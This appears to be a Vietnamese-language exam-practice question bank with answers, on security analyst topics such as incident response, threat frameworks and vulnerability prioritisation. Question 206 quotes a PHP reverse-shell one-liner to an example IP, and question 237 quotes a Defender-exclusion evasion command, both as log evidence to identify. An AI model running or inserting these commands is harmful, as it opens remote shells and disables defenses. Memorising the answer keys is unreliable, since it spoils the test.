Câu 201
Câu hỏi: Khái niệm nào sau đây mô tả đúng nhất về mối đe dọa mà một tổ chức làm việc để đảm bảo rằng tất cả người dùng mạng chỉ mở các tệp đính kèm từ các nguồn đã biết?
A. Mối đe dọa từ hacker
B. Mối đe dọa dai dẳng nâng cao
C. Mối đe dọa nội bộ vô ý
D. Mối đe dọa từ quốc gia
Đáp án: C
Câu 202
Câu hỏi: Một chuyên gia phân tích bảo mật nhận được một trường hợp sự cố liên quan đến phần mềm độc hại lan truyền mất kiểm soát trên mạng của khách hàng. Chuyên gia phân tích không chắc chắn cách phản hồi. EDR đã được cấu hình tự động lấy mẫu phần mềm độc hại và chữ ký của nó. Chuyên gia phân tích nên thực hiện điều nào sau đây tiếp theo để xác định loại phần mềm độc hại dựa trên phép đo từ xa của nó?
A. Đối chiếu chữ ký với thông tin đe dọa nguồn mở.
B. Định cấu hình EDR để thực hiện quét toàn bộ.
C. Chuyển phần mềm độc hại sang môi trường sandbox.
D. Đăng nhập vào các hệ thống bị ảnh hưởng và chạy netstat.
Đáp án: A
Câu 203
Câu hỏi: Một chuyên gia phân tích mạng nhận thấy có một lượng lớn lưu lượng truy cập đột biến trên cổng 1433 giữa hai địa chỉ IP ở hai bên đối diện của kết nối WAN. Nguyên nhân nào sau đây có khả năng nhất?
A. Một thành viên nhóm red team địa phương đang liệt kê phân đoạn RFC1918 địa phương để liệt kê máy chủ
B. Một tác nhân đe dọa đã có chỗ đứng trên mạng và đang gửi tín hiệu điều khiển
C. Quản trị viên đã thực thi một quy trình sao chép cơ sở dữ liệu mới mà không thông báo cho SOC
D. Một tác nhân đe dọa nội bộ đang chạy Responder trên phân đoạn cục bộ, tạo ra sao chép lưu lượng truy cập
Đáp án: C
Câu 204
Câu hỏi: Công cụ nào sau đây hữu ích cho việc lập bản đồ, theo dõi và giảm thiểu các mối đe dọa và lỗ hổng đã xác định với khả năng xảy ra và tác động của chúng?
A. Sổ đăng ký rủi ro
B. Đánh giá lỗ hổng
C. Kiểm tra thâm nhập
D. Báo cáo tuân thủ
Đáp án: A
Câu 205
Câu hỏi: Điều nào sau đây thường được sử dụng để giữ số lượng cảnh báo ở mức có thể quản lý được khi thiết lập quy trình theo dõi và phân tích các vi phạm?
A. Lưu giữ nhật ký
B. Xoay vòng nhật ký
C. Kích thước nhật ký tối đa
D. Giá trị ngưỡng
Đáp án: D
Câu 206
Câu hỏi: Trong khi xem xét nhật ký máy chủ web, một chuyên gia phân tích bảo mật phát hiện ra dòng đáng ngờ sau:
php -r ‘$socket=fsockopen(“10.0.0.1”, 1234); passthru (“/bin/sh -i <&3 >&3 2>&3”);’
Điều nào sau đây đang được cố gắng thực hiện?
A. Bao gồm tệp từ xa
B. Tiêm lệnh
C. Giả mạo yêu cầu phía máy chủ
D. Reverse shell
Đáp án: D
Câu 207
Câu hỏi: Cái nào sau đây nên được cập nhật sau khi xem xét bài học kinh nghiệm?
A. Kế hoạch khôi phục thảm họa
B. Kế hoạch liên tục kinh doanh
C. Bài tập trên bàn
D. Kế hoạch ứng phó sự cố
Đáp án: D
Câu 208
Câu hỏi: Một nhà phát triển phần mềm đã triển khai các ứng dụng web có rủi ro bảo mật phổ biến, bao gồm khả năng ghi nhật ký không đủ. Hành động nào sau đây sẽ hiệu quả nhất để giảm rủi ro liên quan đến việc phát triển ứng dụng?
A. Thực hiện phân tích tĩnh bằng cách sử dụng môi trường phát triển tích hợp
B. Triển khai các biện pháp kiểm soát bù trừ vào môi trường
C. Triển khai ghi nhật ký phía máy chủ và cập nhật tự động
D. Thực hiện đánh giá mã thường xuyên bằng cách sử dụng các phương pháp hay nhất của OWASP
Đáp án: D
Câu 209
Câu hỏi: Một chuyên gia phân tích nghi ngờ mật khẩu văn bản rõ ràng đang được gửi qua mạng. Công cụ nào sau đây sẽ hỗ trợ tốt nhất cho cuộc điều tra của chuyên gia phân tích?
A. OpenVAS
B. Angry IP Scanner
C. Wireshark
D. Maltego
Đáp án: C
Câu 210
Câu hỏi: Sử dụng thông tin tình báo nguồn mở thu thập được từ các diễn đàn kỹ thuật, một tác nhân đe dọa biên soạn và kiểm tra trình tải xuống độc hại để đảm bảo rằng nó sẽ không bị phát hiện bởi các biện pháp bảo vệ bảo mật điểm cuối của tổ chức nạn nhân. Giai đoạn nào sau đây của Chuỗi tiêu diệt mạng phù hợp nhất với hành động của tác nhân đe dọa?
A. Phân phối
B. Trinh sát
C. Khai thác
D. Vũ khí hóa
Đáp án: D
Câu 211
Câu hỏi: Một tổ chức muốn đảm bảo rằng cơ sở hạ tầng đám mây của mình có cấu hình được củng cố. Yêu cầu là tạo ảnh máy chủ có thể được triển khai bằng mẫu an toàn. Tài nguyên nào sau đây là tốt nhất để đảm bảo cấu hình an toàn?
A. Điểm chuẩn CIS
B. PCI DSS
C. OWASP Top Ten
D. ISO 27001
Đáp án: A
Câu 212
Câu hỏi: Một chuyên gia phân tích bảo mật xem xét kết quả quét Arachni sau đây cho một ứng dụng web lưu trữ dữ liệu PII:
(ảnh chụp màn hình kết quả quét Arachni)
Cái nào sau đây nên được khắc phục trước?
A. Tiêm SQL
B. RFI
C. XSS
D. Tiêm mã
Đáp án: A
Câu 213
Câu hỏi: Bên liên quan nào sau đây có nhiều khả năng nhận được báo cáo quét lỗ hổng nhất? (Chọn hai).
A. Ban quản lý điều hành
B. Cơ quan thực thi pháp luật
C. Tiếp thị
D. Pháp lý
E. Chủ sở hữu sản phẩm
F. Quản trị hệ thống
Đáp án: A và F
Câu 214
Câu hỏi: Kỹ thuật nào sau đây có thể giúp nhóm SOC giảm số lượng cảnh báo liên quan đến các hoạt động bảo mật nội bộ mà các nhà phân tích phải phân loại?
A. Làm phong phú dữ liệu được đưa vào SIEM để bao gồm tất cả dữ liệu cần thiết để phân loại
B. Lập lịch tác vụ để tắt cảnh báo khi đang thực hiện quét lỗ hổng
C. Lọc tất cả cảnh báo trong SIEM với mức độ nghiêm trọng thấp
D. Thêm quy tắc SOAR để loại bỏ các thông báo không liên quan và trùng lặp
Đáp án: D
Câu 215
Câu hỏi: Một nhà phân tích đang đánh giá bảng điều khiển quản lý lỗ hổng. Nhà phân tích thấy rằng một lỗ hổng đã được khắc phục trước đó đã xuất hiện lại trên máy chủ cơ sở dữ liệu. Nguyên nhân nào sau đây có nhiều khả năng nhất?
A. Phát hiện là dương tính giả và nên bỏ qua.
B. Đã thực hiện khôi phục trên phiên bản.
C. Trình quét lỗ hổng đã được cấu hình mà không có thông tin xác thực.
D. Phần mềm quản lý lỗ hổng cần được cập nhật.
Đáp án: B
Câu 216
Câu hỏi: Một công ty đã quyết định đưa một số hệ thống lên internet. Các hệ thống hiện chỉ khả dụng nội bộ. Một chuyên gia phân tích bảo mật đang sử dụng một tập hợp con của số liệu khai thác CVSS3.1 để ưu tiên các lỗ hổng có thể bị khai thác nhiều nhất khi các hệ thống được đưa lên internet. Các hệ thống và lỗ hổng được hiển thị bên dưới:
(bảng dữ liệu về hệ thống và lỗ hổng)
Hệ thống nào sau đây nên được ưu tiên vá lỗi?
A. brown
B. grey
C. blane
D. sullivan
Đáp án: C
Câu 217
Câu hỏi: Trong một sự cố mà máy của người dùng bị xâm nhập, một chuyên gia phân tích đã khôi phục một tệp nhị phân có khả năng gây ra việc khai thác. Kỹ thuật nào sau đây có thể được sử dụng để phân tích thêm?
A. Fuzzing
B. Phân tích tĩnh
C. Sandboxing
D. Chụp gói tin
Đáp án: C
Câu 218
Câu hỏi: Trưởng nhóm quản lý lỗ hổng đang cố gắng giảm khối lượng công việc của nhóm bằng cách tự động hóa một số tác vụ đơn giản nhưng tốn thời gian. Hoạt động nào sau đây mà trưởng nhóm nên cân nhắc trước tiên?
A. Chỉ định khuyến nghị tùy chỉnh cho mỗi phát hiện
B. Phân tích dương tính giả
C. Kết xuất báo cáo điều hành bổ sung
D. Thường xuyên kiểm tra liên lạc của tác nhân với bảng điều khiển trung tâm
Đáp án: D
Câu 219
Câu hỏi: Giám đốc An ninh Thông tin (CISO) của một công ty quản lý lớn đã chọn một khung bảo mật mạng giúp tổ chức chứng minh khoản đầu tư của mình vào các công cụ và hệ thống để bảo vệ dữ liệu của mình. CISO có nhiều khả năng chọn điều nào sau đây nhất?
A. PCI DSS
B. COBIT
C. ISO 27001
D. ITIL
Đáp án: C
Câu 220
Câu hỏi: Một lượng lớn các lần thử xác thực RDP không thành công đã được ghi lại trên một máy chủ quan trọng trong vòng một giờ. Tất cả các lần thử đều bắt nguồn từ cùng một địa chỉ IP từ xa và sử dụng một tài khoản người dùng miền hợp lệ duy nhất. Biện pháp kiểm soát giảm thiểu nào sau đây sẽ hiệu quả nhất để giảm tỷ lệ thành công của cuộc tấn công brute-force này?
A. Kích hoạt khóa tài khoản người dùng sau một số lần thử không thành công có hạn
B. Cài đặt công cụ truy cập từ xa của bên thứ ba và vô hiệu hóa RDP trên tất cả các thiết bị
C. Triển khai chặn tường lửa cho địa chỉ IP của hệ thống từ xa
D. Tăng mức độ chi tiết của kiểm tra sự kiện đăng nhập trên tất cả các thiết bị
Đáp án: A
Câu 221
Câu hỏi: Một chuyên gia phân tích ứng phó sự cố đang điều tra nguyên nhân gốc rễ của một vụ bùng phát phần mềm độc hại gần đây. Phân tích nhị phân ban đầu cho thấy phần mềm độc hại này vô hiệu hóa các dịch vụ bảo mật máy chủ và thực hiện các quy trình dọn dẹp trên máy chủ bị nhiễm, bao gồm xóa trình thả ban đầu và xóa các mục nhật ký sự kiện và tệp tải trước khỏi máy chủ. Nguồn dữ liệu nào sau đây có nhiều khả năng tiết lộ bằng chứng về nguyên nhân gốc rễ nhất? (Chọn hai).
A. Thời gian tạo trình thả
B. Tạo tác đăng ký
C. Dữ liệu EDR
D. Tệp tải trước
E. Siêu dữ liệu hệ thống tệp
F. Nhật ký sự kiện Sysmon
Đáp án: B và E
Câu 222
Câu hỏi: Khi thực hiện di chuyển đám mây của nhiều ứng dụng SaaS, quản trị viên hệ thống của tổ chức gặp khó khăn với độ phức tạp của việc mở rộng quản lý nhận dạng và truy cập cho các tài sản dựa trên đám mây. Mô hình dịch vụ nào sau đây sẽ làm giảm độ phức tạp của dự án này?
A. CASB
B. SASE
C. ZTNA
D. SWG
Đáp án: A
Câu 223
Câu hỏi: Một chuyên gia phân tích bảo mật xem xét đoạn trích sau của quét lỗ hổng được thực hiện trên máy chủ web:
(đoạn mã từ kết quả quét lỗ hổng)
Khuyến nghị nào sau đây mà chuyên gia phân tích bảo mật nên đưa ra để củng cố máy chủ web?
A. Xóa thông tin phiên bản trên http-server-header.
B. Vô hiệu hóa tcp_wrappers.
C. Xóa thư mục /wp-login.php.
D. Đóng cổng 22.
Đáp án: A
Câu 224
Câu hỏi: Một chuyên gia phân tích bảo mật đang ứng phó với một sự cố liên quan đến một cuộc tấn công độc hại vào tủ dữ liệu mạng. Điều nào sau đây giải thích rõ nhất cách chuyên gia phân tích nên ghi lại sự cố một cách chính xác?
A. Sao lưu tệp cấu hình cho tất cả các thiết bị mạng.
B. Ghi lại và xác thực từng kết nối.
C. Tạo sơ đồ đầy đủ về cơ sở hạ tầng mạng.
D. Chụp ảnh các mục bị ảnh hưởng.
Đáp án: D
Câu 225
Câu hỏi: Một chuyên gia phân tích bảo mật mạng đang tham gia với nhóm dự án DLP để phân loại dữ liệu của tổ chức. Mục đích chính của việc phân loại dữ liệu là gì?
A. Để xác định các yêu cầu tuân thủ quy định
B. Để tạo điều kiện thuận lợi cho việc tạo quy tắc DLP
C. Để ưu tiên chi phí CNTT
D. Để thiết lập giá trị của dữ liệu đối với tổ chức
Đáp án: D
Câu 226
Câu hỏi: Một chuyên gia phân tích bảo mật đã quan sát thấy hoạt động sau từ một tài khoản đặc quyền:
• Truy cập email và thông tin nhạy cảm
• Nhật ký kiểm toán bị sửa đổi
• Thời gian đăng nhập bất thường
Điều nào sau đây mô tả đúng nhất hoạt động đã quan sát được?
A. Giao tiếp ngang hàng không thường xuyên
B. Đặc quyền trái phép
C. Thiết bị giả mạo trên mạng
D. Tấn công nội bộ
Đáp án: D
Câu 227
Câu hỏi: Một nhóm quản lý lỗ hổng đã tìm thấy bốn lỗ hổng lớn trong quá trình đánh giá và cần cung cấp báo cáo để ưu tiên đúng cách để giảm thiểu thêm. Lỗ hổng nào sau đây nên được ưu tiên hàng đầu cho quy trình giảm thiểu?
A. Một lỗ hổng có các mối đe dọa và IoC liên quan, nhắm mục tiêu vào một ngành khác
B. Một lỗ hổng liên quan đến một chiến dịch đối thủ cụ thể, với IoC được tìm thấy trong SIEM
C. Một lỗ hổng không có đối thủ nào sử dụng nó hoặc IoC liên quan
D. Một lỗ hổng liên quan đến một hệ thống bị cô lập, không có IoC
Đáp án: B
Câu 228
Câu hỏi: Một chuyên gia phân tích bảo mật đã nhận được cảnh báo về nhiều lần đăng nhập MFA thành công cho một người dùng cụ thể. Khi xem xét nhật ký xác thực, chuyên gia phân tích thấy như sau:
(bảng dữ liệu về nhật ký xác thực)
Điều nào sau đây có nhiều khả năng xảy ra nhất, dựa trên nhật ký MFA? (Chọn hai).
A. Tấn công từ điển
B. Lừa đảo đẩy
C. Vận tốc địa lý bất khả thi
D. Trao đổi mô-đun nhận dạng thuê bao
E. Điểm truy cập giả mạo
F. Phun mật khẩu
Đáp án: B và C
Câu 229
Câu hỏi: Một chuyên gia phân tích bảo mật đã xác định một tệp phần mềm độc hại mới đã ảnh hưởng đến tổ chức. Phần mềm độc hại là đa hình và có các trình kích hoạt có điều kiện tích hợp yêu cầu kết nối internet. CPU có quy trình nhàn rỗi ít nhất 70%. Điều nào sau đây mô tả rõ nhất cách chuyên gia phân tích bảo mật có thể xem xét phần mềm độc hại một cách hiệu quả mà không ảnh hưởng đến mạng của tổ chức?
A. Sử dụng phiên RDP trên máy trạm chưa sử dụng để đánh giá phần mềm độc hại.
B. Ngắt kết nối và sử dụng tài sản bị nhiễm hiện có khỏi mạng.
C. Tạo máy chủ ảo để kiểm tra trên máy trạm của chuyên gia phân tích bảo mật.
D. Đăng ký dịch vụ trực tuyến để tạo môi trường sandbox.
Đáp án: C
Câu 230
Câu hỏi: Quy trình mô hình hóa mối đe dọa nào sau đây có trong Hướng dẫn Kiểm tra Bảo mật Web OWASP?
A. Xem xét các yêu cầu bảo mật
B. Kiểm tra tuân thủ
C. Phân hủy ứng dụng
D. Bảo mật theo thiết kế
Đáp án: C
Câu 231
Câu hỏi: Tổ chức nào sau đây sẽ sử dụng để phát triển kế hoạch liên tục kinh doanh?
A. Sơ đồ của tất cả các hệ thống và ứng dụng phụ thuộc lẫn nhau
B. Kho lưu trữ cho tất cả phần mềm được tổ chức sử dụng
C. Danh sách ưu tiên các hệ thống quan trọng do ban lãnh đạo điều hành xác định
D. Cơ sở dữ liệu quản lý cấu hình được in tại một địa điểm ngoài cơ sở
Đáp án: C
Câu 232
Câu hỏi: Nhóm quản lý yêu cầu báo cáo KPI hàng tháng về chương trình bảo mật mạng của công ty. KPI nào sau đây sẽ xác định thời gian mối đe dọa bảo mật không bị phát hiện trong môi trường?
A. Luân chuyển nhân viên
B. Nỗ lực xâm nhập
C. Thời gian trung bình để phát hiện
D. Mức độ chuẩn bị
Đáp án: C
Câu 233
Câu hỏi: Điều nào sau đây mô tả đúng nhất các yếu tố chính của chương trình bảo mật thông tin thành công?
A. Phân tích tác động kinh doanh, quản lý tài sản và thay đổi và kế hoạch truyền thông bảo mật
B. Triển khai chính sách bảo mật, phân công vai trò và trách nhiệm và phân loại tài sản thông tin
C. Lập kế hoạch liên tục kinh doanh và khôi phục thảm họa và xác định các yêu cầu kiểm soát truy cập và chính sách nguồn nhân lực
D. Cơ cấu tổ chức quản lý cấp cao, tiêu chuẩn phân phối thông điệp và quy trình vận hành hệ thống quản lý bảo mật
Đáp án: B
Câu 234
Câu hỏi: Quản trị viên hệ thống nhận thấy tên thư mục lạ trên máy chủ sản xuất. Quản trị viên xem xét danh sách thư mục và tệp, sau đó kết luận rằng máy chủ đã bị xâm nhập. Quản trị viên nên thực hiện bước nào sau đây tiếp theo?
A. Thông báo cho nhóm ứng phó sự cố nội bộ.
B. Làm theo kế hoạch ứng phó sự cố của công ty.
C. Xem xét các bài học kinh nghiệm cho phương pháp tiếp cận tốt nhất.
D. Xác định khi nào quyền truy cập bắt đầu.
Đáp án: B
Câu 235
Câu hỏi: Một tác nhân quốc gia ít có khả năng quan tâm đến điều nào sau đây nhất?
A. Phát hiện bởi khung MITRE ATT & CK.
B. Phát hiện hoặc ngăn chặn các hoạt động do thám.
C. Kiểm tra các hành động và mục tiêu của nó.
D. Phân tích pháp y cho hành động pháp lý của các hành động đã thực hiện.
Đáp án: D
Câu 236
Câu hỏi: Khung bốn thành phần nào sau đây thường được sử dụng để truyền đạt hành vi của tác nhân đe dọa?
A. STRIDE
B. Mô hình kim cương phân tích xâm nhập
C. Chuỗi tiêu diệt mạng
D. MITRE ATT&CK
Đáp án: B
Câu 237
Câu hỏi: Một nhân viên tải xuống một chương trình miễn phí để thay đổi màn hình nền thành giao diện cổ điển của Windows cũ. Ngay sau khi nhân viên cài đặt chương trình, một lượng lớn các truy vấn DNS ngẫu nhiên bắt đầu bắt nguồn từ hệ thống. Một cuộc điều tra trên hệ thống cho thấy điều sau:
Add-MpPreference –ExclusionPath ‘%Program Files%\ksyconfig’
Điều nào sau đây có thể đang xảy ra?
A. Kiên trì
B. Leo thang đặc quyền
C. Thu thập thông tin đăng nhập
D. Né tránh phòng thủ
Đáp án: D
Câu 238
Câu hỏi: Một tổ chức phát hiện ra vi phạm dữ liệu dẫn đến việc PII bị phát hành ra công chúng. Trong quá trình xem xét bài học kinh nghiệm, hội đồng đã xác định những điểm không nhất quán liên quan đến việc ai chịu trách nhiệm báo cáo bên ngoài, cũng như các yêu cầu về thời gian. Hành động nào sau đây sẽ giải quyết tốt nhất vấn đề báo cáo?
A. Tạo sổ tay biểu thị các SLA cụ thể và hành động ngăn chặn cho mỗi loại sự cố
B. Nghiên cứu luật liên bang, yêu cầu tuân thủ quy định và chính sách của tổ chức để ghi lại các SLA báo cáo cụ thể
C. Xác định sự cố bảo mật nào yêu cầu thông báo bên ngoài và báo cáo sự cố ngoài các bên liên quan nội bộ
D. Chỉ định vai trò và trách nhiệm cụ thể trong nhóm bảo mật và các bên liên quan để sắp xếp hợp lý các nhiệm vụ
Đáp án: B
Câu 239
Câu hỏi: Trong một sự cố, một chuyên gia phân tích bảo mật phát hiện ra một lượng lớn PII đã được gửi qua email ra bên ngoài từ một nhân viên đến một địa chỉ email công cộng. Chuyên gia phân tích thấy rằng email bên ngoài là email cá nhân của nhân viên. Điều nào sau đây mà chuyên gia phân tích nên khuyên nên được thực hiện trước tiên?
A. Đặt tạm giữ pháp lý trên hộp thư của nhân viên.
B. Bật lọc trên proxy web.
C. Vô hiệu hóa quyền truy cập email công cộng bằng CASB.
D. Định cấu hình quy tắc từ chối trên tường lửa.
Đáp án: C
Câu 240
Câu hỏi: Cái nào sau đây có thể được sử dụng để tìm hiểu thêm về TTP do tội phạm mạng sử dụng?
A. ZenMAP
B. MITRE ATT&CK
C. Viện Tiêu chuẩn và Công nghệ Quốc gia
D. theHarvester
Đáp án: B
Câu 241
Câu hỏi: Câu nào sau đây mô tả đúng nhất về khung MITRE ATT&CK?
A. Nó cung cấp một phương pháp toàn diện để kiểm tra bảo mật của các ứng dụng.
B. Nó cung cấp chia sẻ thông tin tình báo về mối đe dọa và phát triển các chiến lược hành động và giảm thiểu.
C. Nó giúp xác định và ngăn chặn hoạt động của kẻ thù bằng cách nêu bật các khu vực mà kẻ tấn công hoạt động.
D. Nó theo dõi và hiểu các mối đe dọa và là một dự án nguồn mở đang phát triển.
E. Nó chia nhỏ các vụ xâm nhập thành một chuỗi các giai đoạn được xác định rõ ràng.
Đáp án: C
Câu 242
Câu hỏi: Một Giám đốc An ninh Thông tin (CISO) lo ngại rằng một tác nhân đe dọa cụ thể được biết là nhắm mục tiêu vào loại hình kinh doanh của công ty có thể xâm nhập mạng và ở lại bên trong đó trong một khoảng thời gian dài. Kỹ thuật nào sau đây nên được thực hiện để đáp ứng các mục tiêu của CISO?
A. Quét lỗ hổng
B. Mô phỏng đối thủ
C. Khám phá thụ động
D. Tiền thưởng lỗi
Đáp án: B
Câu 243
Câu hỏi: Một chuyên gia phân tích bảo mật nhận được cảnh báo về hoạt động đáng ngờ trên máy tính xách tay của công ty. Đoạn trích nhật ký được hiển thị bên dưới:
(bảng dữ liệu về nhật ký sự kiện)
Điều nào sau đây có nhiều khả năng xảy ra nhất?
A. Một tài liệu Office có macro độc hại đã được mở.
B. Một trang web đánh cắp thông tin đăng nhập đã được truy cập.
C. Một liên kết lừa đảo trong email đã được nhấp vào.
D. Một lỗ hổng trình duyệt web đã bị khai thác.
Đáp án: A
Câu 244
Câu hỏi: Trong một sự cố, một số IoC về nhiễm ransomware có thể xảy ra đã được tìm thấy trong một nhóm máy chủ trong một phân đoạn của mạng. Bước nào sau đây nên được thực hiện tiếp theo?
A. Cách ly
B. Khắc phục
C. Tạo lại ảnh
D. Bảo tồn
Đáp án: A
Câu 245
Câu hỏi: Một MSSP đã nhận được một số cảnh báo từ khách hàng 1, khiến thời hạn ứng phó sự cố bị bỏ lỡ cho khách hàng 2. Tài liệu nào sau đây mô tả đúng nhất tài liệu đã bị vi phạm?
A. KPI
B. SLO
C. SLA
D. MOU
Đáp án: C
Câu 246
Câu hỏi: Điều nào sau đây là lý do tại sao việc xử lý và báo cáo đúng cách các bằng chứng hiện có rất quan trọng đối với các giai đoạn điều tra và báo cáo của ứng phó sự cố?
A. Để đảm bảo báo cáo được chấp nhận hợp pháp trong trường hợp cần trình bày tại tòa án
B. Để trình bày phân tích bài học kinh nghiệm cho nhóm ứng phó sự cố
C. Để đảm bảo bằng chứng có thể được sử dụng trong phân tích sau khi chết
D. Để ngăn chặn khả năng mất nguồn dữ liệu để phân tích nguyên nhân gốc rễ thêm
Đáp án: A
Câu 247
Câu hỏi: Kẻ tấn công vừa có quyền truy cập vào máy chủ syslog trên mạng LAN. Việc xem xét các mục syslog đã cho phép kẻ tấn công ưu tiên các mục tiêu tiếp theo có thể xảy ra. Đây là ví dụ về điều nào sau đây?
A. Lấy dấu chân mạng thụ động
B. Lấy dấu vân tay hệ điều hành
C. Xác định cổng dịch vụ
D. Phiên bản ứng dụng
Đáp án: A
Câu 248
Câu hỏi: Một chuyên gia phân tích bảo mật đã quan sát thấy các hoạt động sau theo thứ tự thời gian:
- Cảnh báo vi phạm giao thức trên tường lửa bên ngoài
- Hoạt động quét nội bộ trái phép
- Thay đổi hiệu suất mạng đi
Điều nào sau đây mô tả đúng nhất mục tiêu của tác nhân đe dọa?
A. Đánh cắp dữ liệu
B. Đỉnh lưu lượng truy cập bất thường
C. Thiết bị giả mạo
D. Giao tiếp ngang hàng không thường xuyên
Đáp án: A
Câu 249
Câu hỏi: Sau khi xem xét báo cáo cuối cùng cho một bài kiểm tra thâm nhập, một chuyên gia phân tích bảo mật mạng ưu tiên việc khắc phục các lỗ hổng xác thực đầu vào. Chuyên gia phân tích đang tìm cách ngăn chặn các cuộc tấn công nào sau đây?
A. Ngộ độc DNS
B. Pharming
C. Lừa đảo
D. Kịch bản chéo trang
Đáp án: D
Câu 250
Câu hỏi: Trong quá trình kiểm tra bảo mật, chuyên gia phân tích bảo mật đã tìm thấy một ứng dụng quan trọng có lỗ hổng tràn bộ đệm. Cái nào sau đây sẽ là tốt nhất để giảm thiểu lỗ hổng ở cấp độ ứng dụng?
A. Thực hiện củng cố hệ điều hành.
B. Thực hiện xác thực đầu vào.
C. Cập nhật các phụ thuộc của bên thứ ba.
D. Định cấu hình ngẫu nhiên bố cục không gian địa chỉ.
Đáp án: B
Để lại một bình luận